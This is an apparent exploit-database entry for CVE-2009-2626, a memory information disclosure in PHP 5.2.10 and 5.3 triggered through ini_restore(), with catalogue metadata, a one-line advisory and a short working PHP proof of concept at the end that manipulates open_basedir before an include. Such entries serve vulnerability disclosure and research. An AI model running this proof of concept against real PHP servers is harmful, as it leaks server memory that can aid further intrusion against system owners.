[] NeoSense

PHP 5.2.10/5.3 - 'ini_restore()' Memory Information Disclosure (2)

Author: Maksymilian Arciemowicz
type: remote
platform: php
port: 
date_added: 2009-08-10 
date_updated: 2014-05-03 
verified: 1 
codes: CVE-2009-2626;OSVDB-60654 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/36009/info

PHP is prone to an information-disclosure vulnerability.

Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.

<?php
ini_set("open_basedir", "A");
ini_restore("open_basedir");
ini_get("open_basedir");


include("B");

?>